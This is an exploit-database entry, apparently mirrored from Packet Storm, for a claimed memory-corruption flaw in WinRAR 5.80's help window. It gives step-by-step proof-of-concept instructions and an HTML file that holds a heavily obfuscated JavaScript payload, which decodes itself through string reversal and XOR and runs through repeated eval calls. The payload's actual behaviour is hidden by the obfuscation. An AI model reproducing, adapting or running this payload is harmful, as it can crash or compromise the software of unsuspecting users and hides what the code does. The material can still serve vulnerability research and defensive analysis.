Share
## https://sploitus.com/exploit?id=PACKETSTORM:154917
# Exploit Title: winrar memory corruption
# Exploit Author: albalawi-s
# Vendor Homepage: https://win-rar.com
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: [5.80]
# Tested on: [Microsoft Windows Version 10.0.18362.418 64bit]
#https://twitter.com/test_app_______
------------------------------------------------
# poc video
https://www.youtube.com/watch?v=NVDVP33kHuU
# POC
1- open winrar or any file.rar
2- help
3- help topics
4- Drag the exploit.html to the window
--------------------------------------------------
Save the content html
******************************************
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
"\\\\,l=x.length;for(i=0;i<l;i++){y%=127;o+=String.fromCharCode(x.charCodeAt" +
"(i)^(y++));}return o;}f(\\\"\\\\K_RG^Q[B\\\\\\\\031OKSOYQP\\\\\\\\027b}*7))" +
"x\\\\\\\\033:\\\\\\\\025$w!(:.p9&'$x3&-0,f\\\\\\\\000\\\\\\\\177&r\\\\\\\\0" +
"25\\\\\\\\000O\\\\\\\\000\\\\\\\\013\\\\\\\\010\\\\\\\\026\\\\\\\\006\\\\\\" +
"\\034\\\\\\\\000\\\\\\\\010\\\\\\\\007\\\\\\\\t1LO\\\\\\\\023\\\\\\\\036\\\\"+
"\\\\034\\\\\\\\007\\\\\\\\021\\\\\\\\033\\\\\\\\002J$[3>AE\\\\\\\\\\\"\\\\\\"+
"\\\\\\\\\"\\\\?^qXk:jm}k+dyz\\\\\\\\177=tcf}c+K:\\\\\\\\\\\\\\\\bkuo{l|\\\\" +
"\\\\003\\\\\\\\002@KKRBF]\\\\\\\\027w\\\\\\\\016\\\\\\\\000\\\\\\\\037s\\\\" +
"\\\\022\\\\\\\\017nAh[\\\\\\\\nUW]C\\\\\\\\005`ObQ|2!1-52g$($,9,)*m\\\\\\\\" +
"rp\\\\\\\\005\\\\\\\\026\\\\\\\\0065%1).u\\\\\\\\0313=0\\\\\\\\004\\\\\\\\0" +
"04>AZ9\\\\\\\\024;\\\\\\\\0065\\\\\\\\0307\\\\\\\\002MNO4\\\\\\\\030\\\\\\\\"+
"037S\\\\\\\\007\\\\\\\\035\\\\\\\\032WX%\\\\\\\\010'\\\\\\\\022]^ Rgw$vnk(4" +
"*H~ho{u^pyqvb?D;Mh\\\\\\\\177owoT\\\\\\\\017qKAIJ{\\\\\\\\n\\\\\\\\000\\\\\\"+
"\\n\\\\\\\\013p_rA\\\\\\\\020\\\\\\\\021\\\\\\\\022pUYZ\\\\\\\\027KQV\\\\\\" +
"\\025nHP\\\\\\\\027\\\\\\\\034c\\\\\\\\036a\\\\\\\\030g%*,g/3)\\\\\\\\021l\\"+
"\\\\\\023r\\\\\\\\rpztu\\\\\\\\n%\\\\\\\\0047z{|\\\\\\\\016;+@\\\\\\\\022\\" +
"\\\\\\n\\\\\\\\017DXF)\\\\\\\\007\\\\\\\\035\\\\\\\\002\\\\\\\\002\\\\\\\\0" +
"02\\\\\\\\nNOPQ.\\\\\\\\001(\\\\\\\\033VWX%\\\\\\\\010'\\\\\\\\022AQsbpjtq8" +
"[zUd7\\\\\\\\177n|f`e2gmes*D;n~di1uAWCPGWOW\\\\\\\\\\\\\\\\u\\\\\\\\010\\\\" +
"\\\\025p_rAVD\\\\\\\\\\\\\\\\P@\\\\\\\\\\\\\\\\YY\\\\\\\\030\\\\\\\\\\\\\\\\"+
"B\\\\\\\\023\\\\\\\\025\\\\\\\\035Ec2\\\\\\\\035,\\\\\\\\03703'5h+?-*(<omq\\"+
"\\\\\\016q\\\\\\\\010wm\\\\\\\\013*\\\\\\\\0054\\\\\\\\007(;1-@I\\\\\\\\024" +
"\\\\\\\\002\\\\\\\\026E\\\\\\\\017GUIZPL\\\\\\\\004NSPDBCDEFGCY\\\\\\\\023P" +
"WT^{]p_jYr[|k\\\\\\\\177mjh|/;,2O6m\\\\\\\\\\\"\\\\&D;!GnApCT\\\\\\\\\\\\\\" +
"\\~QxKzS^HX\\\\\\\\013NXHIUC\\\\\\\\000\\\\\\\\023\\\\\\\\t\\\\\\\\025TB^__" +
"I\\\\\\\\007aLc.\\\\\\\\0356%+7fo!iwk|vn&pmrfdefgcy3pwt~$<\\\\\\\\023>\\\\\\"+
"\\r8\\\\\\\\021:\\\\\\\\023\\\\\\\\n\\\\\\\\034\\\\\\\\014\\\\\\\\r\\\\\\\\" +
"t\\\\\\\\037\\\\\\\\\\\\\\\\O[LR\\\\\\\\021\\\\\\\\001\\\\\\\\023\\\\\\\\02" +
"0\\\\\\\\022\\\\\\\\nB&\\\\\\\\t \\\\\\\\023\\\\\\\\\\\"\\\\t|^qXkZslfi~ah`" +
"{>e{gxp6*8{o}zxl-\\\\\\\\033}P\\\\\\\\177JXzUtG\\\\\\\\026\\\\\\\\004_N\\\\" +
"\\\\\\\\\\\\F@E\\\\\\\\014\\\\\\\\017\\\\\\\\033]SV\\\\\\\\\\\\\\\\\\\\\\\\" +
"007\\\\\\\\006YSYG\\\\\\\\037//.,%!{\\\\\\\\033j,2ce\\\\\\\\021lq\\\\\\\\01" +
"4#\\\\\\\\016=hz7i\\\\\\\\004+\\\\\\\\0065`r<0\\\\\\\\004\\\\\\\\030\\\\\\\\"+
"\\\\\\\\?\\\\\\\\0269\\\\\\\\010[G\\\\\\\\001\\\\\\\\036\\\\\\\\006\\\\\\\\" +
"000SLFKAI\\\"\\\\,47)\\\"(f};)lo,0(rtsbus.o nruter};)i(tArahc.x=+o{)--i;0=>" +
"i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)74=!)31/l(tAedoCrahc.x(elihw;lo=l,ht" +
"gnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\")" ;
while(x=eval(x));
//-->
//]]>
</script>